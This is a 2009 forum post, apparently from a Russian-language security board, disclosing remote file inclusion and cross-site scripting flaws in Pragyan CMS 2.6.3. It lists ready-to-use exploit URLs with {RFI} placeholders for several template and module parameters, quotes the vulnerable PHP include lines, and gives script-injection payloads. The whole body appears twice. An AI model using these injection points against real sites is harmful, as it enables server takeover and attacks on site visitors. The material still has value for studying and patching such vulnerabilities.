Spyder
22.04.2009, 01:00
Pragyan CMS 2.6.3 Multiple Vulnerabilities
Developers: sourceforge.net/projects/pragyan
1) Remote File Inclusion
Need: register_globals = on
http://localhost/pragyan/cms/templates/nitt2/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt3/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt4/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/default/index.php?TEMPLATECODEPATH={RFI}?
<?
include_once("$TEMPLATECODEPATH/sidebar.php");
http://localhost/pragyan/cms/modules/search/search.php?sourceFolder={RFI}?
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");
и ещё один инклуд остался с версии 2.6.2
http://localhost/pragyan/cms/modules/form.lib.php?sourceFolder={RFI}?
global $sourceFolder;
global $moduleFolder;
require_once("$sourceFolder/$moduleFolder/form/editform.php");
2) XSS
Need: register_globals = on
http://localhost/pragyan/cms/templates/acm/index.php
http://localhost/pragyan/cms/templates/crystalx/index.php
http://localhost/pragyan/cms/templates/blue/index.php
http://localhost/pragyan/cms/templates/default/index.php
http://localhost/pragyan/cms/templates/nitt2/index.php
http://localhost/pragyan/cms/templates/nitt3/index.php
http://localhost/pragyan/cms/templates/nitt4/index.php
http://localhost/pragyan/cms/templates/prag08V2-black/index.php
$TITLE = </title><script>alert('xek')</script>
$TEMPLATEBROWSERPATH = "><script>alert('xek')</script>
... etc
Всех переменных не пишу, так как их оч много. И думаю что код приводить не имеет смысла
Пока что не весь двиг раскопал, проблемы с mod_rewrite (
Developers: sourceforge.net/projects/pragyan
1) Remote File Inclusion
Need: register_globals = on
http://localhost/pragyan/cms/templates/nitt2/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt3/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt4/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/default/index.php?TEMPLATECODEPATH={RFI}?
<?
include_once("$TEMPLATECODEPATH/sidebar.php");
http://localhost/pragyan/cms/modules/search/search.php?sourceFolder={RFI}?
$searchModuleFolder = "$sourceFolder/$moduleFolder/search";
$include_dir = "$searchModuleFolder/include";
include ("$include_dir/commonfuncs.php");
и ещё один инклуд остался с версии 2.6.2
http://localhost/pragyan/cms/modules/form.lib.php?sourceFolder={RFI}?
global $sourceFolder;
global $moduleFolder;
require_once("$sourceFolder/$moduleFolder/form/editform.php");
2) XSS
Need: register_globals = on
http://localhost/pragyan/cms/templates/acm/index.php
http://localhost/pragyan/cms/templates/crystalx/index.php
http://localhost/pragyan/cms/templates/blue/index.php
http://localhost/pragyan/cms/templates/default/index.php
http://localhost/pragyan/cms/templates/nitt2/index.php
http://localhost/pragyan/cms/templates/nitt3/index.php
http://localhost/pragyan/cms/templates/nitt4/index.php
http://localhost/pragyan/cms/templates/prag08V2-black/index.php
$TITLE = </title><script>alert('xek')</script>
$TEMPLATEBROWSERPATH = "><script>alert('xek')</script>
... etc
Всех переменных не пишу, так как их оч много. И думаю что код приводить не имеет смысла
Пока что не весь двиг раскопал, проблемы с mod_rewrite (